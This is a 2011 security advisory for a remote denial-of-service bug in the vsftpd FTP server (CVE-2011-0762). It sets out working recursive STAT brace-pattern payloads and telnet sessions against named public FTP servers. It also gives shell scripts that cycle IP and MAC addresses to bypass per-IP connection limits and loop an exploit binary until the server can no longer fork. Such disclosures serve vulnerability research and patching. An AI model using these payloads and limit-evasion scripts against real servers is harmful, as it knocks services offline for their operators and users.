[ vsftpd 2.3.2 remote denial-of-service ]

Author: Maksymilian Arciemowicz
- Dis.: 23.12.2010
- Pub.: 01.03.2011

CVE: CVE-2011-0762 
CERT: VU#590604 

Fix: vsftpd 2.3.4 (15.02.2011)

Affected Software (verified):
- vsftpd 2.3.2 (NetBSD 5.1)
- vsftpd 2.3.0 (Ubuntu 10.10)

Affected Servers (19.02.2011):
- ftp.gnu.org (2.0.6) 
- ftp.kernel.org (2.2.2)
- ftpgen.wip4.adobe.com (2.3.2)
- ftp.oracle.com (2.0.5)
- ftp.freebsd.org (2.2.0)
- more more more...

--- 0.Description ---
vsftpd is a GPL licensed FTP server for UNIX systems, including Linux. It is secure and extremely fast. It is stable. Don't take my word for it, though. Below, we will see evidence supporting all three assertions. We will also see a list of a few important sites which are happily using vsftpd. This demonstrates vsftpd is a mature and trusted solution. 

--- 1. vsftpd 2.3.2 remote denial-of-service ---
As we can read in "ls.c" vsftpd file...

   * parsing and handling. There is broad potential for any given fnmatch(3)
   * implementation to be buggy.
   * Currently supported pattern(s):
   * - any number of wildcards, "*" or "?"
   * - {,} syntax (not nested)

That true but anyone who has changed ftpd bsd daemon to vsftpd to protect before CVE-2010-2632 (glob(3) resource exhaustion) are in danger. Any code with huge complexity, could allow of denial of service if an affected system received vulnerable pattern. This bug allow to disable wide range of servers. To designate vulnerable servers, we have to used pattern with medium complexity.

-Example affected server---
cx@cx64:~$ telnet ftp.gnu.org 21
Connected to ftp.gnu.org.
Escape character is '^]'.
220 GNU FTP server ready.
USER anonymous
PASS abra@cadabra.abw
STAT {{*},....}
230 Login successful.
230 Already logged in.
213-Status follows:

-Example affected server---

Execution time may have wide range depending on the length of pattern:
empty     2388 97.3  0.0  37980  1352 ?        R    Dec23 222:42 /usr/sbin/vsftpd

222m and counting...

so any next {{*},Recursion} will increment the complexity. Let's see what is wrong and where. In vsftpd the main problem exists in ls.c.

vsf_filename_passes_filter(const struct mystr* p_filename_str,
                           const struct mystr* p_filter_str)
else if (last_token == '{')
      struct str_locate_result end_brace =
        str_locate_char(&filter_remain_str, '}');
      must_match_at_current_pos = 1;
      if (end_brace.found)
        str_split_char(&filter_remain_str, &temp_str, '}');
        str_copy(&brace_list_str, &filter_remain_str);
        str_copy(&filter_remain_str, &temp_str);
        str_split_char(&brace_list_str, &temp_str, ',');
        while (!str_isempty(&brace_list_str))
          str_copy(&new_filter_str, &brace_list_str);
          str_append_str(&new_filter_str, &filter_remain_str);
          if (vsf_filename_passes_filter(&name_remain_str, &new_filter_str)) <===== LIMIT THIS CALL
            ret = 1;

 if (vsf_filename_passes_filter(&name_remain_str, &new_filter_str)) <===== LIMIT THIS CALL

this call should be limited, and in version 2.3.4 has been fixed.

A simple way to show growth in computing power ...
(1*2*3*4*...*count(vsf_filename_passes_filter complexity)) == count(vsf_filename_passes_filter complexity)!

Compare two patterns and see different between

STAT {{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{.}}}}}}}}}}}}}}}}}}}}}}}}}}

and add next {*,...}

STAT {{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{.}}}}}}}}}}}}}}}}}}}}}}}}}}}

and in the end, compare:
STAT {{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{.}}}]}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}

hovever in vsftpd, command lenght is allowed to 4096 bytes. So it's no problem to create request with a huge complexity

To bypass max_per_ip, use ISP with dynamic ip. Disconnect and connect (example for bt mobile phone):

cx@cx64:~$ hciconfig hci0 down
cx@cx64:~$ hciconfig hci0 up

and connect again. 

Download vspoc232.c and compile, then create some script to changing your ip (netbsd51: pcn0)

-change.sh; change ip by mac(local dos)---
# example change ip script
ifconfig pcn0 down
/etc/rc.d/dhclient stop 
ifconfig pcn0 link 00:0c:0c:0c:$1:$2 active 
dhclient pcn0
/etc/rc.d/dhclient start
ifconfig pcn0 up
-change.sh; change ip by mac(local dos)---

or use mobile phone via bluetooth. 

-change.sh; conn-diss bt---
# example change ip script
hciconfig hci0 down
hciconfig hci0 up
-change.sh; conn-diss bt---

then run.sh

# vsftpd exploit with change ip option
# sh run.sh [ip] [port] [user] [password]

echo "vsftpd exploit";
while [ $mac != 0xff ]; do { 
mac=`expr $mac + 1`;
./vspoc232 $1 $2 $3 $4
sh ./change.sh 66 $mac
} done

then run and see result

sh ./run.sh 21 cx pass

on my local netbsd5.1 (default instalation),  we reach to limit and no more new processes (DoS).

Result (forked dos):

root     149  0.0  0.1  2932  1152 ?     Is    2:31AM 0:00.01 vsftpd /usr/pkg/e
cx       150  0.0  0.2  2956  1592 ?     R     2:32AM 0:01.22 vsftpd /usr/pkg/e
cx       160  0.3  0.2  2956  1592 ?     R     2:31AM 0:01.48 vsftpd /usr/pkg/e
cx       161  0.2  0.2  2956  1592 ?     R     2:32AM 0:01.03 vsftpd /usr/pkg/e
root     258  0.0  0.1  2932  1152 ?     Is    2:32AM 0:00.01 vsftpd /usr/pkg/e
root     278  0.0  0.1  2932  1152 ?     Is    2:32AM 0:00.02 vsftpd /usr/pkg/e
cx       289  0.0  0.2  2956  1592 ?     R     2:32AM 0:00.97 vsftpd /usr/pkg/e
cx       321  0.0  0.2  2956  1592 ?     R     2:32AM 0:00.85 vsftpd /usr/pkg/e
root    5139  0.0  0.1  2932  1164 ?     Is    2:35AM 0:00.01 vsftpd /usr/pkg/e
root    5145  0.0  0.1  2932  1164 ?     Is    2:35AM 0:00.02 vsftpd /usr/pkg/e
root    5156  0.0  0.1  2932  1164 ?     Is    2:35AM 0:00.01 vsftpd /usr/pkg/e
root    5159  0.0  0.1  2932  1164 ?     Is    2:35AM 0:00.01 vsftpd /usr/pkg/e
cx      5170  0.0  0.2  2956  1608 ?     R     2:35AM 0:00.44 vsftpd /usr/pkg/e
root    5190  0.0  0.1  2932  1168 ?     Is    2:35AM 0:00.01 vsftpd /usr/pkg/e
cx      5192  0.0  0.2  2956  1612 ?     R     2:35AM 0:00.39 vsftpd /usr/pkg/e
cx      5242  0.0  0.2  2956  1612 ?     R     2:35AM 0:00.39 vsftpd /usr/pkg/e
cx      5250  0.0  0.2  2956  1612 ?     R     2:35AM 0:00.49 vsftpd /usr/pkg/e
root    7199  0.0  0.1  2932  1164 ?     Is    2:35AM 0:00.01 vsftpd /usr/pkg/e
cx      7248  0.0  0.2  2956  1612 ?     R     2:35AM 0:00.63 vsftpd /usr/pkg/e
root    7256  0.0  0.1  2932  1168 ?     Is    2:35AM 0:00.01 vsftpd /usr/pkg/e
root    7276  0.0  0.1  2932  1168 ?     Is    2:35AM 0:00.01 vsftpd /usr/pkg/e

bypassing max_per_ip we have created more than 5000 vsftdp children processes. 

cx@cx64:~$ telnet 21
Connected to
Escape character is '^]'.
500 OOPS: fork
Connection closed by foreign host.

--- 2. Exploit ---

--- 3. Fix ---

--- 4. Greets ---
Chris Evans

--- 5. Contact ---
Author: Maksymilian Arciemowicz